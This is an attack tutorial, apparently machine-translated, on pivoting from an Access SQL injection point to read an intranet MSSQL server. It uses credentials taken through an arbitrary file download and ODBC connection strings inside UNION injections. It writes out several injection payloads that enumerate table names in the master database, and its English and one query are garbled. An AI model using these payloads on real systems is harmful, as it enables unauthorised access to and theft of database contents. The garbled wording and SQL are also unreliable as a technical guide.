Access injection points read MSSQL database content

Author: Emperor

First of all, this method has been available for a long time, but it takes about too long to silence in the head, and it is forgotten. Thanks to Trace for providing information.

Attackers often encounter Arbitrary File Download vulnerabilities. The common solution is to download the Database Connection Files and connect them remotely. The most ideal state is MSSQL and MYSQL, especially when the database and the WEB are not separated, there are many methods available to split SHELL and export SHELL. However, if the database is isolated from the WEB, and the database cannot access the Internet on the Intranet, or there are firewalls and other means that we cannot connect to a remote database, it may be a bit difficult to assume, you cannot even find an mssql injection point, which is usually helpless in many cases.

Here, taking MSSQL as an example, we found an Arbitrary File Download Vulnerability, directly accessing the WEB. CONFIG came back and saw that the database was on the Intranet. After half a day, I couldn't find the injection point. I noticed that there was a website, but it was a pity that the ACCESS database was used. The table and background cannot be guessed. However, the background of the target station is known, and you are ready to read the Administrator account of the target station from this access injection point. Intuitive. The following is my local test result:

Simply put, there are three fields: ID, XM, XB, ID, and the next two signature types.
If the vulnerability exists in the file, execute the SQL statement select * from test whrere id = 1
Here there are three fields. We can use the UNION query to match them (the number of fields is determined by order by or exhaustive when black box operations are performed)

SELECT * FROM test where id = 999999 union Select top 1, 2, name from [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; Server = *****; dataBase = master]. ku

In the master database, I created a table named KU. In the preceding query statement, because id = 999999 does not exist, under the combined query function, the position where the access database content is originally displayed on the web shows the UNION query result we constructed, and the name field is in a balanced display position.

 

The name field in the ku table is displayed on the web, but this is obviously not what we want. What we want is the structure and content of the entire table.
Take the master as an example. Here is the simulation result. I already know the structure of the master. It will be convenient to compare it with the result to check whether there is a mistake,

SELECT * FROM test where id = 999999 union Select top 1 1, 2, table_name from [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; Server = *****; dataBase = master]. information_schema.tables

In this way, the first table name of the master database will come out.

It's easy to get the name of the following table.

SELECT * FROM test where id = 999999 union Select top 1 1, 2, table_name from [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; Server = *****; dataBase = master]. information_schema.tables where table_name not in (select top 1 table_name from [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; Server = ***; DataBase = master]. information_schema.tables)

The field name and field content are obtained using the regular method of the class.

If the ID in the database is of the standby type

SELECT * FROM test where id = 999999 union Select top 1 1, 2, table_name from [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; Server = ***; dataBase = master]. information_schema.tables where 1 = 1